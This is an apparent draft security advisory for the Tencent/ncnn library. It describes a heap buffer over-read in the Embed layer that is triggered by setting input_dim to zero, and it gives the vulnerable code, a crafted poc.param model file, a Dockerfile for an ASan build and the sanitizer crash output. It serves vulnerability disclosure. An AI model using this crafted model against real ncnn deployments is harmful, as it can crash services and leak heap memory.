All advisories
Draft

Heap Buffer Over-Read in Embed Layer

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Over-Read in Embed Layer

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/embed.cpp:80 in embed
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted ncnn model that sets an Embed layer's input_dim to zero makes ncnn compute an embedding row pointer before the start of the weight allocation and memcpy from it into the layer output. An attacker who can supply .param/.bin files to tools/ncnnoptimize — the entry point used in the confirmed PoC, which loads the model at tools/ncnnoptimize.cpp:2797 and then calls ModelWriter::shape_inference() — crashes the optimizer, and on a non-instrumented build copies heap memory preceding the weight buffer into a tensor that the optimizer serializes.

Detail

The untrusted field is parameter key 1 of the Embed layer, stored as input_dim. It is never validated in Embed::load_param and is never compared against weight_data_size (key 3) in Embed::load_model; the weight Mat is sized purely from weight_data_size. input_dim is then passed straight through Embed::forward into the static embed() helper, where it is used only as an upper clamp on the word index read from the input tensor.

// src/layer/embed.cpp:62
        int word_index = ((const int*)bottom_blob)[q];

        if (word_index < 0)
            word_index = 0;
        if (word_index >= input_dim)
            word_index = input_dim - 1;

        const float* em = (const float*)weight_data + num_output * word_index;

        if (bias_ptr)
        {
            for (int p = 0; p < num_output; p++)
            {
                outptr[p] = em[p] + bias_ptr[p];
            }
        }
        else
        {
            memcpy(outptr, em, num_output * sizeof(float));
        }

The clamping logic assumes input_dim >= 1. The PoC sets Embed embed 1 1 data out 0=1 1=0 2=0 3=1 18=0, i.e. num_output=1, input_dim=0, bias_term=0, weight_data_size=1. The first clamp forces word_index to 0; the second then fires, because 0 >= 0 is true, and rewrites it to input_dim - 1 == -1. The pointer arithmetic on the next line becomes weight_data + 1 * (-1), one float below the base of the allocation.

Because bias_term is 0, bias_ptr is null and control reaches the memcpy at line 80, copying num_output * sizeof(float) — four bytes — from that address. ASan reports the read as landing 4 bytes before the 84-byte region that Embed::load_model obtained through ModelBinFromDataReader::load for the single declared weight. Raising num_output scales the copy length linearly, so the same underflow reads an attacker-chosen number of bytes preceding the weight buffer into a tensor that survives shape inference.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-over-read-in-embed-layer && cd ncnn-poc-heap-buffer-over-read-in-embed-layer

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'PARAM'
7767517
2 2
Input data 0 1 data 0=1
Embed embed 1 1 data out 0=1 1=0 2=0 3=1 18=0
PARAM

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e00000003c at pc 0x79946734542e bp 0x7ffcf2b37610 sp 0x7ffcf2b36db8
READ of size 4 at 0x50e00000003c thread T0
    #0 0x79946734542d in memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115
    #1 0x603d29d79ceb in embed /ncnn/src/layer/embed.cpp:80
    #2 0x603d29d7a4df in ncnn::Embed::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/src/layer/embed.cpp:143
    #3 0x603d27231f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #4 0x603d27223b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x603d272839e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x603d271153c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x603d27192eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x799466ccd1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x799466ccd28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x603d27112624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e00000003c is located 4 bytes before 84-byte region [0x50e000000040,0x50e000000094)
allocated by thread T0 here:
    #0 0x799467346f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x603d271e1bc5 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x603d271e1bc5 in ncnn::Mat::create(int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:331
    #3 0x603d27214381 in ncnn::ModelBinFromDataReader::load(int, int) const /ncnn/src/modelbin.cpp:273
    #4 0x603d29d763f2 in ncnn::Embed::load_model(ncnn::ModelBin const&) /ncnn/src/layer/embed.cpp:29
    #5 0x603d2727ea84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #6 0x603d27192c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
    #7 0x799466ccd1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x799466ccd28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x603d27112624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors_memintrinsics.inc:115 in memcpy

Credit

Zheng Yu @ DepthFirst